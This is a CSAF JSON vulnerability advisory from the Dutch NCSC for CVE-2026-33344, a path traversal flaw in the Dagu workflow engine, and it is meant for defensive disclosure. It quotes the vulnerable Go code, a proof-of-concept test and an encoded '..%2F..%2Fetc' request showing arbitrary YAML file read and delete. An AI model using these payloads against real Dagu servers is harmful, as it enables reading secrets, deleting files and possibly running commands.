{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33344",
        "tracking": {
            "current_release_date": "2026-03-29T01:16:58.000365Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33344",
            "initial_release_date": "2026-03-21T01:08:19.131312Z",
            "revision_history": [
                {
                    "date": "2026-03-21T01:08:19.131312Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-21T01:08:22.304159Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-24T20:53:55.267681Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-24T20:54:13.814986Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T20:54:31.125579Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1).| Unknown change."
                },
                {
                    "date": "2026-03-24T20:54:33.734983Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T18:13:05.394299Z",
                    "number": "7",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-25T18:13:42.037131Z",
                    "number": "8",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (2)."
                },
                {
                    "date": "2026-03-26T00:50:30.793741Z",
                    "number": "9",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-26T00:50:41.636459Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-26T13:25:38.291459Z",
                    "number": "11",
                    "summary": "Products created (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-26T13:25:44.814335Z",
                    "number": "12",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-28T07:58:20.000082Z",
                    "number": "13",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-28T07:58:23.539438Z",
                    "number": "14",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-28T08:11:14.259515Z",
                    "number": "15",
                    "summary": "References removed (1)."
                },
                {
                    "date": "2026-03-29T01:16:44.642883Z",
                    "number": "16",
                    "summary": "References created (1)."
                }
            ],
            "status": "interim",
            "version": "16"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=2.0.0|<2.3.1",
                                "product": {
                                    "name": "vers:unknown/>=2.0.0|<2.3.1",
                                    "product_id": "CSAFPID-5917714",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:dagu:dagu:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "dagu"
                    }
                ],
                "category": "vendor",
                "name": "dagu"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=1.30.4-0.20260221021317-e2ed589105d7|<1.30.4-0.20260319093346-7d07fda8f9de",
                                "product": {
                                    "name": "vers:unknown/>=1.30.4-0.20260221021317-e2ed589105d7|<1.30.4-0.20260319093346-7d07fda8f9de",
                                    "product_id": "CSAFPID-5907217"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=2.0.0|<2.3.1",
                                "product": {
                                    "name": "vers:unknown/>=2.0.0|<2.3.1",
                                    "product_id": "CSAFPID-5902837"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "dagu"
                    }
                ],
                "category": "vendor",
                "name": "dagu-org"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33344",
            "cwe": {
                "id": "CWE-22",
                "name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "The fix for CVE-2026-27598 (commit e2ed589, PR #1691) added `ValidateDAGName` to `CreateNewDAG` and rewrote `generateFilePath` to use `filepath.Base`. This patched the CREATE path. The remaining API endpoints - GET, DELETE, RENAME, EXECUTE - all pass the `{fileName}` URL path parameter to `locateDAG` without calling `ValidateDAGName`. `%2F`-encoded forward slashes in the `{fileName}` segment traverse outside the DAGs directory.\n\n### Vulnerable code\n\n`internal/persis/filedag/store.go`, lines 508-513:\n\n```go\nfunc (store *Storage) locateDAG(nameOrPath string) (string, error) {\n    if strings.Contains(nameOrPath, string(filepath.Separator)) {\n        foundPath, err := findDAGFile(nameOrPath)\n        if err == nil {\n            return foundPath, nil  // returns arbitrary resolved path\n        }\n    }\n    // ...safe searchPaths branch follows\n```\n\n`findDAGFile` resolves the path with `filepath.Abs` and checks only that the file exists with a YAML extension. No containment check against `baseDir`.\n\nChi v5 routes using `r.URL.RawPath` when set. The pattern `/dags/{fileName}/spec` captures `..%2F..%2Fetc%2Ftarget.yaml` as a single path segment. The oapi-codegen runtime calls `url.PathUnescape`, producing `../../etc/target.yaml`. 
This decoded string reaches `locateDAG` with the `/` separator intact.\n\nGo's `net/http.ServeMux` would normally redirect paths containing `..`, but dagu binds the chi mux directly to `&http.Server{Handler: r}` (server.go:833-834), so no path cleaning fires.\n\n### Affected endpoints\n\nThe three confirmed impacts via `locateDAG`:\n\n| Endpoint | Impact |\n|----------|--------|\n| `GET /dags/{fileName}/spec` | Arbitrary `.yaml`/`.yml` file read (`os.ReadFile`) |\n| `DELETE /dags/{fileName}` | Arbitrary `.yaml`/`.yml` file delete (`os.Remove`) |\n| `POST /dags/{fileName}/start` | Load arbitrary YAML, execute as workflow |\n\nSame pattern affects all other `{fileName}` endpoints: `/dag-runs`, `/dag-runs/{id}`, `/rename`, `/start-sync`, `/enqueue`, and webhook handlers. `UpdateDAGSpec` is incidentally blocked by DAG name validation during YAML parsing - not a security check, just data integrity validation that happens to reject `/`.\n\n### PoC\n\n**Store-level** (dagu v2.0.2, Go 1.26, macOS; `locateDAG` unchanged through v2.3.0):\n\n```go\nfunc TestLocateDAGPathTraversal(t *testing.T) {\n    baseDir, _ := os.MkdirTemp(\"\", \"bd\")\n    defer os.RemoveAll(baseDir)\n    outsideDir, _ := os.MkdirTemp(\"\", \"od\")\n    defer os.RemoveAll(outsideDir)\n\n    store := filedag.New(baseDir, filedag.WithSkipExamples(true))\n    ctx := context.Background()\n    store.Create(ctx, \"legit\", []byte(\"name: legit\\nsteps:\\n  - name: s\\n    command: echo ok\\n\"))\n\n    target := filepath.Join(outsideDir, \"secret.yaml\")\n    os.WriteFile(target, []byte(\"password: hunter2\\ndb_host: prod-db.internal\\n\"), 0644)\n\n    rel, _ := filepath.Rel(baseDir, target)\n    spec, _ := store.GetSpec(ctx, rel)\n    fmt.Println(spec)\n}\n```\n\nOutput:\n\n```\nbaseDir:    /tmp/bd1816472583\ntargetFile: /tmp/od3906487343/secret.yaml\ntraversal:  ../od3906487343/secret.yaml\n\n=== GetSpec (arbitrary file read) ===\nSUCCESS: read file outside baseDir\nContent:\npassword: hunter2\ndb_host: 
prod-db.internal\n\n=== Delete (arbitrary file delete) ===\nSUCCESS: deleted /tmp/od3906487343/important.yaml\n```\n\n**HTTP-level** (chi v5.2.2):\n\n```go\nr := chi.NewRouter()\nr.Get(\"/dags/{fileName}/spec\", func(w http.ResponseWriter, r *http.Request) {\n    raw := chi.URLParam(r, \"fileName\")\n    decoded, _ := url.PathUnescape(raw)\n    fmt.Fprintf(w, \"raw=%s\\ndecoded=%s\\n\", raw, decoded)\n})\n\nreq := httptest.NewRequest(\"GET\", \"/dags/..%2F..%2Fetc%2Ftarget.yaml/spec\", nil)\nw := httptest.NewRecorder()\nr.ServeHTTP(w, req)\n```\n\nOutput:\n\n```\npath: /dags/..%2F..%2Fetc%2Fpasswd/spec\nstatus: 200\nraw=..%2F..%2Fetc%2Fpasswd\ndecoded=../../etc/passwd\n```\n\nChi captures `..%2F..%2Fetc%2Fpasswd` as one path segment via `RawPath`, and oapi-codegen decodes `%2F` to `/`. Confirmed with chi v5.2.2. Note that the request in the snippet targets `etc%2Ftarget.yaml` while the output shown is for `etc%2Fpasswd`; in both cases the handler only echoes the parameter, so this output demonstrates the routing and decoding step, not a file read.\n\n### Affected versions\n\n- v2.0.0 through v2.3.0 (current latest, checked 2026-03-18).\n- The `locateDAG` function with the `filepath.Separator` code path was introduced in commit 1557b14f (PR #1573) as part of the v2.0.0 rewrite.\n- The CVE-2026-27598 fix (e2ed589) also landed in v2.0.0 - it patched `CreateNewDAG` but didn't address the new `locateDAG` code path that was introduced in the same release.\n\n### Suggested fix\n\nAdd path containment to `locateDAG` rather than sprinkling `ValidateDAGName` across every handler. Reject names containing path separators for HTTP-facing callers. If the separator code path is needed for internal worker communication (PR #1573), split `locateDAG` into a validated public method (HTTP handlers) and an internal method (trusted callers only).\n\n### Impact\n\nAn authenticated user (or any user if `auth.mode=none`) can read or delete any `.yaml`/`.yml` file on the server filesystem that the process can access. This includes K8s secrets stored as YAML, app configs, and other DAG files.\n\nThe execute endpoints also traverse via `locateDAG`, loading the target YAML as a DAG definition. 
If the file contains valid DAG syntax with shell commands, those commands execute as the dagu process user. I haven't verified this end-to-end since it requires a target file with DAG-compatible structure, but the code path is the same `locateDAG` call confirmed above.\n\nAuth is enabled by default since PR #1688 (v2.0.0), but exploitable by any authenticated user regardless of role - the DAG read/delete paths don't enforce RBAC granularity. Pre-v2.0.0 deployments or those with `auth.mode=none` are exploitable without credentials.",
                    "title": "github - https://api.github.com/advisories/GHSA-ph8x-4jfv-v9v8"
                },
                {
                    "category": "description",
                    "text": "Dagu is a workflow engine with a built-in Web user interface. From version 2.0.0 to before version 2.3.1, the fix for CVE-2026-27598 added ValidateDAGName to CreateNewDAG and rewrote generateFilePath to use filepath.Base. This patched the CREATE path. The remaining API endpoints - GET, DELETE, RENAME, EXECUTE - all pass the {fileName} URL path parameter to locateDAG without calling ValidateDAGName. %2F-encoded forward slashes in the {fileName} segment traverse outside the DAGs directory. This issue has been patched in version 2.3.1.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33344"
                },
                {
                    "category": "description",
                    "text": "Dagu is a workflow engine with a built-in Web user interface. From version 2.0.0 to before version 2.3.1, the fix for CVE-2026-27598 added ValidateDAGName to CreateNewDAG and rewrote generateFilePath to use filepath.Base. This patched the CREATE path. The remaining API endpoints - GET, DELETE, RENAME, EXECUTE - all pass the {fileName} URL path parameter to locateDAG without calling ValidateDAGName. %2F-encoded forward slashes in the {fileName} segment traverse outside the DAGs directory. This issue has been patched in version 2.3.1.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33344.json"
                },
                {
                    "category": "description",
                    "text": "The fix for CVE-2026-27598 (commit e2ed589, PR #1691) added `ValidateDAGName` to `CreateNewDAG` and rewrote `generateFilePath` to use `filepath.Base`. This patched the CREATE path. The remaining API endpoints - GET, DELETE, RENAME, EXECUTE - all pass the `{fileName}` URL path parameter to `locateDAG` without calling `ValidateDAGName`. `%2F`-encoded forward slashes in the `{fileName}` segment traverse outside the DAGs directory.\n\n### Vulnerable code\n\n`internal/persis/filedag/store.go`, lines 508-513:\n\n```go\nfunc (store *Storage) locateDAG(nameOrPath string) (string, error) {\n    if strings.Contains(nameOrPath, string(filepath.Separator)) {\n        foundPath, err := findDAGFile(nameOrPath)\n        if err == nil {\n            return foundPath, nil  // returns arbitrary resolved path\n        }\n    }\n    // ...safe searchPaths branch follows\n```\n\n`findDAGFile` resolves the path with `filepath.Abs` and checks only that the file exists with a YAML extension. No containment check against `baseDir`.\n\nChi v5 routes using `r.URL.RawPath` when set. The pattern `/dags/{fileName}/spec` captures `..%2F..%2Fetc%2Ftarget.yaml` as a single path segment. The oapi-codegen runtime calls `url.PathUnescape`, producing `../../etc/target.yaml`. 
This decoded string reaches `locateDAG` with the `/` separator intact.\n\nGo's `net/http.ServeMux` would normally redirect paths containing `..`, but dagu binds the chi mux directly to `&http.Server{Handler: r}` (server.go:833-834), so no path cleaning fires.\n\n### Affected endpoints\n\nThe three confirmed impacts via `locateDAG`:\n\n| Endpoint | Impact |\n|----------|--------|\n| `GET /dags/{fileName}/spec` | Arbitrary `.yaml`/`.yml` file read (`os.ReadFile`) |\n| `DELETE /dags/{fileName}` | Arbitrary `.yaml`/`.yml` file delete (`os.Remove`) |\n| `POST /dags/{fileName}/start` | Load arbitrary YAML, execute as workflow |\n\nSame pattern affects all other `{fileName}` endpoints: `/dag-runs`, `/dag-runs/{id}`, `/rename`, `/start-sync`, `/enqueue`, and webhook handlers. `UpdateDAGSpec` is incidentally blocked by DAG name validation during YAML parsing - not a security check, just data integrity validation that happens to reject `/`.\n\n### PoC\n\n**Store-level** (dagu v2.0.2, Go 1.26, macOS; `locateDAG` unchanged through v2.3.0):\n\n```go\nfunc TestLocateDAGPathTraversal(t *testing.T) {\n    baseDir, _ := os.MkdirTemp(\"\", \"bd\")\n    defer os.RemoveAll(baseDir)\n    outsideDir, _ := os.MkdirTemp(\"\", \"od\")\n    defer os.RemoveAll(outsideDir)\n\n    store := filedag.New(baseDir, filedag.WithSkipExamples(true))\n    ctx := context.Background()\n    store.Create(ctx, \"legit\", []byte(\"name: legit\\nsteps:\\n  - name: s\\n    command: echo ok\\n\"))\n\n    target := filepath.Join(outsideDir, \"secret.yaml\")\n    os.WriteFile(target, []byte(\"password: hunter2\\ndb_host: prod-db.internal\\n\"), 0644)\n\n    rel, _ := filepath.Rel(baseDir, target)\n    spec, _ := store.GetSpec(ctx, rel)\n    fmt.Println(spec)\n}\n```\n\nOutput:\n\n```\nbaseDir:    /tmp/bd1816472583\ntargetFile: /tmp/od3906487343/secret.yaml\ntraversal:  ../od3906487343/secret.yaml\n\n=== GetSpec (arbitrary file read) ===\nSUCCESS: read file outside baseDir\nContent:\npassword: hunter2\ndb_host: 
prod-db.internal\n\n=== Delete (arbitrary file delete) ===\nSUCCESS: deleted /tmp/od3906487343/important.yaml\n```\n\n**HTTP-level** (chi v5.2.2):\n\n```go\nr := chi.NewRouter()\nr.Get(\"/dags/{fileName}/spec\", func(w http.ResponseWriter, r *http.Request) {\n    raw := chi.URLParam(r, \"fileName\")\n    decoded, _ := url.PathUnescape(raw)\n    fmt.Fprintf(w, \"raw=%s\\ndecoded=%s\\n\", raw, decoded)\n})\n\nreq := httptest.NewRequest(\"GET\", \"/dags/..%2F..%2Fetc%2Ftarget.yaml/spec\", nil)\nw := httptest.NewRecorder()\nr.ServeHTTP(w, req)\n```\n\nOutput:\n\n```\npath: /dags/..%2F..%2Fetc%2Fpasswd/spec\nstatus: 200\nraw=..%2F..%2Fetc%2Fpasswd\ndecoded=../../etc/passwd\n```\n\nChi captures `..%2F..%2Fetc%2Fpasswd` as one path segment via `RawPath`, and oapi-codegen decodes `%2F` to `/`. Confirmed with chi v5.2.2. Note that the request in the snippet targets `etc%2Ftarget.yaml` while the output shown is for `etc%2Fpasswd`; in both cases the handler only echoes the parameter, so this output demonstrates the routing and decoding step, not a file read.\n\n### Affected versions\n\n- v2.0.0 through v2.3.0 (current latest, checked 2026-03-18).\n- The `locateDAG` function with the `filepath.Separator` code path was introduced in commit 1557b14f (PR #1573) as part of the v2.0.0 rewrite.\n- The CVE-2026-27598 fix (e2ed589) also landed in v2.0.0 - it patched `CreateNewDAG` but didn't address the new `locateDAG` code path that was introduced in the same release.\n\n### Suggested fix\n\nAdd path containment to `locateDAG` rather than sprinkling `ValidateDAGName` across every handler. Reject names containing path separators for HTTP-facing callers. If the separator code path is needed for internal worker communication (PR #1573), split `locateDAG` into a validated public method (HTTP handlers) and an internal method (trusted callers only).\n\n### Impact\n\nAn authenticated user (or any user if `auth.mode=none`) can read or delete any `.yaml`/`.yml` file on the server filesystem that the process can access. This includes K8s secrets stored as YAML, app configs, and other DAG files.\n\nThe execute endpoints also traverse via `locateDAG`, loading the target YAML as a DAG definition. 
If the file contains valid DAG syntax with shell commands, those commands execute as the dagu process user. I haven't verified this end-to-end since it requires a target file with DAG-compatible structure, but the code path is the same `locateDAG` call confirmed above.\n\nAuth is enabled by default since PR #1688 (v2.0.0), but exploitable by any authenticated user regardless of role - the DAG read/delete paths don't enforce RBAC granularity. Pre-v2.0.0 deployments or those with `auth.mode=none` are exploitable without credentials.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-ph8x-4jfv-v9v8.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "Dagu has an incomplete fix for CVE-2026-27598: path traversal via %2F-encoded slashes in locateDAG in github.com/dagu-org/dagu",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4785.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00016",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "3.4",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "Exploit code publicly available, There is exploit data available from source Nvd, The value of the most recent EPSS score",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5902837",
                    "CSAFPID-5907217",
                    "CSAFPID-5917714"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-ph8x-4jfv-v9v8"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33344"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33344.json"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-ph8x-4jfv-v9v8.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4785.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/dagu-org/dagu/security/advisories/GHSA-ph8x-4jfv-v9v8"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/dagu-org/dagu/commit/7d07fda8f9de3ae73dfb081ccd0639f8059c56bb"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-ph8x-4jfv-v9v8"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33344"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
                        "baseScore": 8.1,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-5902837",
                        "CSAFPID-5907217",
                        "CSAFPID-5917714"
                    ]
                }
            ],
            "title": "CVE-2026-33344"
        }
    ]
}